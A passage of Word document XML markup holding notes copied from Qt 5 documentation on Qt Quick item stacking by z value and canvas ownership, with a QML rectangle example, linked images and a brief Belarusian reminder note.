            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Item::z</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">property. Z values </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7690">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>below 0 will stack</w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> below the parent, and if z values are assigned then siblings will stack in z-order (with creation order used to break ties). Z values only </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7690">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>affect stacking compared to siblings and the parent item</w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. If you have an item who is obscured by a subtree rooted above its parent item, no z value on that item will increase its stacking order to stack above that subtree. </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7690">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>To stack that item above the other subtree you'll have to alter z values farther up in the hierarchy, or re-arrange the visual item hierarchy</w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>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color</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str"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"#272822"</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320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480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y</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64</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z</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256</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256</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color</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str"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"green"</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x</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192</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y</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64</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z</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2000</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128</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128</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color</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str"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"red"</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typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Rectangle</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lang w:val="en-US"/>
        </w:rPr>
        <w:t>{</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x</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64</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y</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192</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z</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width</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256</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height</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lit"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>256</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0552B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        color</w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w: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str"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"blue"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0060552B" w:rsidRPr="0060552B" w:rsidRDefault="0060552B" w:rsidP="0060552B">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60552B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0060552B" w:rsidRPr="0060552B" w:rsidRDefault="0060552B" w:rsidP="0060552B">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0060552B" w:rsidRPr="0060552B" w:rsidRDefault="0060552B" w:rsidP="0060552B">
      <w:pPr>
        <w:pStyle w:val="centeralign"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "http://doc.qt.io/qt-5/images/visual-parent-example2.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="002E1325">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="002E1325">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/visual-parent-example2.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="002E1325">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00253BB1">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00253BB1">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/visual-parent-example2.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00253BB1">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00BD2950">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00BD2950">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/visual-parent-example2.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00BD2950">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="008E2997">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008E2997">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/visual-parent-example2.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="008E2997">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00450174">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00450174">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/visual-parent-example2.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00450174">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00B31A2B">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00B31A2B">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/visual-parent-example2.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00B31A2B">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="000C4D6F">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="000C4D6F">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/visual-parent-example2.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="000C4D6F">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00B34EC9">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00B34EC9">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/visual-parent-example2.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00B34EC9">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/visual-parent-example2.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005A2BD2">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="005A2BD2">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/visual-parent-example2.png"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"http://doc.qt.io/qt-5/images/visual-parent-example2.png"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"http://doc.qt.io/qt-5/images/visual-parent-example2.png"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"http://doc.qt.io/qt-5/images/visual-parent-example2.png"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"http://doc.qt.io/qt-5/images/visual-parent-example2.png"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"http://doc.qt.io/qt-5/images/visual-parent-example2.png"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"http://doc.qt.io/qt-5/images/visual-parent-example2.png"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"http://doc.qt.io/qt-5/images/visual-parent-example2.png"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"http://doc.qt.io/qt-5/images/visual-parent-example2.png"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"http://doc.qt.io/qt-5/images/visual-parent-example2.png"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"http://doc.qt.io/qt-5/images/visual-parent-example2.png"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"http://doc.qt.io/qt-5/images/visual-parent-example2.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00490E7E">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="002230B8">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_i1041" type="#_x0000_t75" alt="" style="width:237.9pt;height:5in">
            <v:imagedata r:id="rId1923" r:href="rId1924"/>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00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00B34EC9">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="000C4D6F">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00B31A2B">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00450174">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="008E2997">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00BD2950">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00253BB1">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="002E1325">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="0060552B" w:rsidRPr="0060552B" w:rsidRDefault="0060552B" w:rsidP="0060552B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">In the above </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7690">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, the red rectangle has a high z value, but is still stacked below the blue rectangle. This is because it is a child of the green rectangle, and the green rectangle is a sibling </w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>of the blue rectangle. The z value of the green rectangle is lower than that of the blue rectangle, so the green rectangle and all children will be stacked beneath the blue rectangle.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0060552B" w:rsidRPr="0060552B" w:rsidRDefault="0060552B" w:rsidP="00BA1CDE">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1551" w:name="canvas-ownership"/>
      <w:bookmarkStart w:id="1552" w:name="_Toc483000866"/>
      <w:bookmarkStart w:id="1553" w:name="_Toc483003859"/>
      <w:bookmarkStart w:id="1554" w:name="_Toc483604212"/>
      <w:bookmarkStart w:id="1555" w:name="_Toc483605432"/>
      <w:bookmarkEnd w:id="1551"/>
      <w:r w:rsidRPr="00BA1CDE">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Canvas Ownership</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1552"/>
      <w:bookmarkEnd w:id="1553"/>
      <w:bookmarkEnd w:id="1554"/>
      <w:bookmarkEnd w:id="1555"/>
    </w:p>
    <w:p w:rsidR="0060552B" w:rsidRPr="0060552B" w:rsidRDefault="0060552B" w:rsidP="0060552B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The definition of what is rendered in a Qt Quick scene is the v</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7690">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>isual item tree rooted at</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7690">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1925" w:anchor="contentItem-prop" w:history="1">
        <w:r w:rsidRPr="003C7690">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQuickWindow::contentItem</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7690">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Therefore to add an </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1CDE">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Item to a specific Qt Quick scene for rendering it needs to become a visual hierarchy child of an Item already in the visual item hierarchy</w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, such as</w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1926" w:anchor="contentItem-prop" w:history="1">
        <w:r w:rsidRPr="0060552B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQuickWindow::contentItem</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0060552B" w:rsidRDefault="0060552B" w:rsidP="00D143AF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00660D4F" w:rsidRDefault="00490E7E" w:rsidP="00BA1CDE">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1927" w:history="1">
        <w:bookmarkStart w:id="1556" w:name="_Toc483000867"/>
        <w:bookmarkStart w:id="1557" w:name="_Toc483003860"/>
        <w:r w:rsidR="00660D4F" w:rsidRPr="0090003B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http</w:t>
        </w:r>
        <w:r w:rsidR="00660D4F" w:rsidRPr="00660D4F">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>://</w:t>
        </w:r>
        <w:r w:rsidR="00660D4F" w:rsidRPr="0090003B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>doc</w:t>
        </w:r>
        <w:r w:rsidR="00660D4F" w:rsidRPr="00660D4F">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidR="00660D4F" w:rsidRPr="0090003B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qt</w:t>
        </w:r>
        <w:r w:rsidR="00660D4F" w:rsidRPr="00660D4F">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidR="00660D4F" w:rsidRPr="0090003B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>io</w:t>
        </w:r>
        <w:r w:rsidR="00660D4F" w:rsidRPr="00660D4F">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>/</w:t>
        </w:r>
        <w:r w:rsidR="00660D4F" w:rsidRPr="0090003B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qt</w:t>
        </w:r>
        <w:r w:rsidR="00660D4F" w:rsidRPr="00660D4F">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>-5/</w:t>
        </w:r>
        <w:r w:rsidR="00660D4F" w:rsidRPr="0090003B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qtquick</w:t>
        </w:r>
        <w:r w:rsidR="00660D4F" w:rsidRPr="00660D4F">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:r w:rsidR="00660D4F" w:rsidRPr="0090003B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>visualcanvas</w:t>
        </w:r>
        <w:r w:rsidR="00660D4F" w:rsidRPr="00660D4F">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:r w:rsidR="00660D4F" w:rsidRPr="0090003B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>scenegraph</w:t>
        </w:r>
        <w:r w:rsidR="00660D4F" w:rsidRPr="00660D4F">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidR="00660D4F" w:rsidRPr="0090003B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00660D4F" w:rsidRPr="00660D4F">
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidR="00660D4F">
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>абавязкова потым гэтым заняцца.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1556"/>
      <w:bookmarkEnd w:id="1557"/>
    </w:p>
    <w:p w:rsidR="00660D4F" w:rsidRDefault="00490E7E" w:rsidP="00D143AF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1928" w:history="1">
